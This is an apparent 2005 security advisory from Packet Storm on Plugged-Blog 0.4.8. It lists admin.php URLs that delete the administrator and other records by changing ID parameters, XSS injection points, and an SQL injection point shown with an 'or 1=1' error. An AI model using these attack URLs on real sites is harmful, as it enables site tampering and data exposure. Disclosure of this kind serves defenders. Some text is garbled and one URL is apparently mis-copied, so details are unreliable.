pluggedBlog.txt

2005-08-05T00:00:00
ID PACKETSTORM:39018
Type packetstorm
Reporter FalconDeOro
Modified 2005-08-05T00:00:00

Description

                                        
                                            `###############################  
Plugged-Blog XSS and SQL-Injection flaw & Remove Admin  
vendor url: http://www.pluggedout.com  
advisory: http://falcondeoro.blogspot.com/2005/07/plugged-blog-xss-and-sql-injection.html  
vendor notify: yes exploit available: yes  
###############################  
  
  
Plugged-Blog is a CMS WebBlog-Portal content management systen,  
theinstall es very easy to use and configure,it's great to use,  
it'sspeed.It's have a Readme and very well It's solution to all  
WebMasterand normal users to level down.  
  
#########versions#########  
  
0.4.8  
  
#########Solution#########  
  
No solution at this time !  
  
!#########Timeline########  
  
Discovered: 29-07-2005  
vendor notify: 29-07-2005  
disclosure: 30-07-2005  
  
####### Bad Definition ########  
-Bad definition to variable userid=  
-Bad definition to variable contentid=  
-Bad definition to variable templateid=  
-Bad definition to variable doctupeid=  
-Bad definition to variable list_from=  
-Bad definition to variable usertypeid=  
-Bad definition to variable templateid=  
-bad definition to variable contenttypeid=  
  
http://[victim]/admin.php?action=user_del&userid=[change-valor-actually-ascendent]  
  
http://[victim]/admin.php?action=content_del&contentid=[change-valor-actually-ascendent]  
  
http://[victim]/admin.php?action=template_edit&templateid=[change-valor-actually-ascendent]  
  
http://[victim]/admin.php?action=document_add&doctypeid=[change-valor-actually-ascendent]  
  
http://[victim]/admin.php?action=user_list&list_from=[change-valor-actually-ascendent]  
  
http://[victim]/admin.php?action=usertype_edit&usertypeid=[change-valor-actually-ascendent]  
  
  
http://[victim]/admin.php?action=template_del&templateid=[change-valor-actually-ascendent]  
  
  
  
What do you want remove if it doesen't have nothing? :D  
  
http://[victim]/admin.php?action=contenttype_del&contenttypeid=[change-valor-actually-ascendent]  
  
What do you want remove if it doesn't have nothing? :p  
  
######## How remove Admin ########  
  
For default, the users Admin and Guest exist. And the userid to admin  
is 2, and the userid for the guest is 1.If you want to remove Admin,  
you write on browser :  
  
http://[victim]/admin.php?action=user_del&userid=2  
  
If you want to remove Guest, you write on browser :  
  
http://[victim]/admin.php?action=user_del&userid=2  
  
Observation: You require login for the user Admin.  
  
##################Proof of comcepts##################  
  
In the messages we want write XSS code and we see in WebBlog Home.If  
you writes message XSS Code, in the url :  
  
####### XSS message #######  
  
http://[victim]/admin.php?action=report_statistics&report=visitors  
  
http://[victim]/admin.php?action=content_list  
  
http://[victim]/admin.php?action=report_statistics&report=page_hits  
  
Select the ID to visit (only if he see the message XSS) and we seethe XSS.  
  
  
#########  
XSS  
#########  
  
  
http://[victim]/admin.php?action=content_edit&contentid=[XSS-Code]  
  
http://[victim]/admin.php?action=report_statistics&report=visitors&&s=[XSS-Code]  
  
  
#########  
Observation  
#########  
  
http://[victim]/admin.php?action=template_del&templateid=[change-valor-actually-ascendent]  
  
What do you want remove, if it doesen't have nothing? :D  
  
http://[victim]/admin.php?action=contenttype_del&contenttypeid=[change-valor-actually-ascendent]  
  
What do you want remove if it doesn't have nothing? :p  
  
  
###########  
Errors SQl & Sql Injection  
###########  
  
If you write XSS code in the url :  
http://[victim]/admin.php?action=contenttype_edit&contenttypeid=[XSS-Code]  
  
Or you change the definition to contenttypeid=[change-the-valor]  
  
you can see the message error:  
Problem with SQL  
  
[SELECTnContentSecurityId,cms_ContentSecurity.nUserTypeId,  
cms_ContentSecurity.nContentTypeId,cUserTypeName,cView,cAdd,cEdit,cDelete,  
cApproveFROM cms_ContentSecurity INNER JOIN cms_UserType  
ONcms_ContentSecurity.nUserTypeId=cms_UserType.nUserTypeId  
WHEREnContentTypeId= ORDER BY cUserTypeName]  
  
And the table to message :  
  
Problem with SQL [SELECT * FROM cms_ContentTypeProperties  
WHEREnContentTypeId= ORDER BY nSortIndex]  
  
You can see the Tables and fields.  
  
If you write XSS code in the url to up, you can see the message  
error:Could not find record [SELECT * FROM cms_Content WHERE  
nContentId=;]  
  
And you have the name to the Table and the field affected.  
  
http://[victim]/admin.php?action=report_statistics&report=visitors&list_from=[SQL-Injection]  
  
And you see these error:SELECT COUNT(nStatisticId) AS  
nCount,MAX(dView) ASdLastView,cSessionId,cIPAddress FROM  
cms_Statistics GROUP BYcSessionId,cIPAddress ORDER BY dLastView DESC  
LIMIT or 1=1,20  
  
  
######################## €nd ##########################  
  
Thxs to Lostmon for support (lostmon@gmail.com) http://lostmon.blogspot.com/  
  
  
  
--   
Atentamente:  
FalconDeOro (falcondeoro.blogspot.com)  
Web-Blog: http://falcondeoro.blogspot.com  
`